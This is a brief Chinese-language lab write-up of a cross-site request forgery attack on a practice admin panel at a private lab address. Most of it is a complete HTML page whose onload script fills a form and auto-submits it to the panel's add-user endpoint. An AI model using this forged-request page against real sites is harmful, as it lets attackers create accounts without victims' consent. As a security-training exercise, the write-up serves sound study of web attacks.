正常打开页面:http://192.168.209.137/CSRF0/admin/users.php?do=add_user
这个网页使用request来接受信息的,所以可以接收GET也可以接收POST,通过burp抓提交的数据包得。
可以看到后面有一个do参数为add_confirm和我们之前的写表单的网址http://192.168.209.137/CSRF0/admin/users.php?do=add_user有相同的参数。那么说明提交的时候是在do=add_confirm里进行的,get方式直接拼接url即可。接下来构造POST请求。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF</title>
<script>
function abc(){
var f=document.getElementById("test");
f.getElementsByTagName("input")[0].value="user";
f.getElementsByTagName("input")[1].value="pass";
f.getElementsByTagName("input")[2].value="user";
f.getElementsByTagName("input")[3].value="user";
f.getElementsByTagName("input")[4].value="user";
f.submit();
}
</script>
</head>
<body onload="abc()">
<form action="http://192.168.209.137/CSRF0/admin/users.php?do=add_confirm" id="test" method="POST">
<input type="text" name="pseudo">
<input type="text" name="email">
<input type="text" name="fname">
<input type="text" name="lname">
<input type="text" name="password">
</form>
</body>
</html>
成功添加。